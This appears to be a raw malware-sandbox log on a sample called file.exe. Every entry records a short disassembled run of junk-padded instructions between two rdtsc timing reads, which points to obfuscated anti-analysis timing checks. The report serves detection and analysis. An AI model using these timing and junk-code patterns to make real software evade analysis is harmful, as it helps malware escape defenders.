Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9832 second address: AE985D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E3h 0x00000007 jmp 00007FDE8C51D4E4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE985D second address: AE9871 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jl 00007FDE8CE8B4CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9871 second address: AE98F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FDE8C51D4DCh 0x0000000c pushad 0x0000000d jmp 00007FDE8C51D4E5h 0x00000012 jmp 00007FDE8C51D4E2h 0x00000017 popad 0x00000018 push esi 0x00000019 jmp 00007FDE8C51D4E0h 0x0000001e jmp 00007FDE8C51D4E9h 0x00000023 pop esi 0x00000024 pushad 0x00000025 js 00007FDE8C51D4D6h 0x0000002b push eax 0x0000002c pop eax 0x0000002d jmp 00007FDE8C51D4E4h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF23C0 second address: AF23D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FDE8CE8B4C6h 0x0000000d jmp 00007FDE8CE8B4CAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF0657 second address: AF065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF065B second address: AF068A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8CE8B4D2h 0x0000000b jmp 00007FDE8CE8B4CDh 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FDE8CE8B4C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF068A second address: AF068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1073 second address: AF1087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop esi 0x00000008 jbe 00007FDE8CE8B4EDh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF1087 second address: AF108B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF11F4 second address: AF11FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF137E second address: AF13C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FDE8C51D4E7h 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007FDE8C51D4D6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007FDE8C51D4DCh 0x0000001e jo 00007FDE8C51D4D6h 0x00000024 je 00007FDE8C51D4D6h 0x0000002a popad 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF89A8 second address: AF89AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF8370 second address: AF8374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF8374 second address: AF83B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CEh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FDE8CE8B4CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FDE8CE8B4CEh 0x00000018 jl 00007FDE8CE8B4C6h 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007FDE8CE8B4CCh 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AF852E second address: AF8552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDE8C51D4E6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B059F4 second address: B059F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B05B91 second address: B05BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007FDE8C51D4D6h 0x0000000e jmp 00007FDE8C51D4E6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B05BB8 second address: B05BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B05BC0 second address: B05BFC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDE8C51D4D6h 0x00000008 jbe 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007FDE8C51D4E2h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push edi 0x0000001a push eax 0x0000001b pop eax 0x0000001c pop edi 0x0000001d jmp 00007FDE8C51D4DAh 0x00000022 push edx 0x00000023 jng 00007FDE8C51D4D6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A09B second address: B0A0A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A0A4 second address: B0A0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDE8C51D4D6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0A0AF second address: B0A0BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09C80 second address: B09C87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B09DB6 second address: B09DD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D7h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B485 second address: B1B48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B48B second address: B1B48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B48F second address: B1B493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B493 second address: B1B499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B499 second address: B1B4B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B4B6 second address: B1B4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B4BA second address: B1B4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B21AC6 second address: B21ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B202E8 second address: B202EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B205D8 second address: B205DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B205DC second address: B205F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jne 00007FDE8C51D4D6h 0x0000000d js 00007FDE8C51D4D6h 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B20A5B second address: B20A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B20BAF second address: B20BBB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 je 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B24254 second address: B24258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B32907 second address: B3291C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3291C second address: B32922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B32922 second address: B3293B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jl 00007FDE8C51D4DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B41767 second address: B4176F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4176F second address: B41773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43013 second address: B43018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43018 second address: B43046 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007FDE8C51D4D6h 0x00000009 jmp 00007FDE8C51D4DBh 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FDE8C51D4E5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B42EEF second address: B42EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B448A6 second address: B448B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B448B0 second address: B448B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B448B6 second address: B448D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E1h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45EBF second address: B45EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45EC3 second address: B45EC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B45EC7 second address: B45ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FDE8CE8B4D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47E3A second address: B47E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47E3E second address: B47E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDE8CE8B4D8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B47E71 second address: B47E9A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDE8C51D4D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FDE8C51D4F3h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDE8C51D4E3h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61352 second address: B61358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61358 second address: B6136C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDE8C51D4DCh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60875 second address: B60894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007FDE8CE8B4C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60894 second address: B608AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b push ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e js 00007FDE8C51D4D6h 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B608AD second address: B608B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B608B1 second address: B608B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B608B5 second address: B608BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60B7B second address: B60B8E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8C51D4DCh 0x00000008 jp 00007FDE8C51D4D6h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60F54 second address: B60F5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B60F5A second address: B60F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6108B second address: B61091 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B629CF second address: B629DB instructions: 0x00000000 rdtsc 0x00000002 js 00007FDE8C51D4DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6538D second address: B65397 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8CE8B4CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6564C second address: B65650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B65650 second address: B656A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDE8CE8B4CDh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FDE8CE8B4C8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dword ptr [ebp+1244EF50h], edi 0x00000030 push 00000004h 0x00000032 mov dh, 40h 0x00000034 mov dh, bh 0x00000036 call 00007FDE8CE8B4C9h 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e push edx 0x0000003f pop edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B656A7 second address: B656AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B656AB second address: B656DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007FDE8CE8B4CFh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FDE8CE8B4D1h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B656DD second address: B6570D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FDE8C51D4DFh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDE8C51D4E1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67360 second address: B67364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66E31 second address: B66E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDE8C51D4D6h 0x0000000a jmp 00007FDE8C51D4DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66E49 second address: B66E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66E4E second address: B66E92 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8C51D4DCh 0x00000008 jno 00007FDE8C51D4EEh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FDE8C51D4E8h 0x00000018 jmp 00007FDE8C51D4DCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66E92 second address: B66E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D6C second address: B68D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FDE8C51D4D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D76 second address: B68D80 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDE8CE8B4C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D80 second address: B68D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FDE8C51D4D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D90 second address: B68D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D94 second address: B68DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007FDE8C51D4DBh 0x00000010 pop edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68DB1 second address: B68DBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E4CB second address: A7E4F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FDE8C51D4E7h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FDE8C51D4D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7E68D second address: A7E6AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE8CE8B4D8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C8035F second address: 4C803DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 22h 0x0000000d call 00007FDE8C51D4E9h 0x00000012 pop eax 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FDE8C51D4E9h 0x0000001d xor ecx, 64F9D096h 0x00000023 jmp 00007FDE8C51D4E1h 0x00000028 popfd 0x00000029 mov si, D107h 0x0000002d popad 0x0000002e mov edx, dword ptr [ebp+0Ch] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edi, 682B8D2Ah 0x00000039 mov di, 51F6h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C803DD second address: 4C803E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C803E3 second address: 4C803E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C803E7 second address: 4C80405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDE8CE8B4D1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80405 second address: 4C8040B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CB0396 second address: 4CB039C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
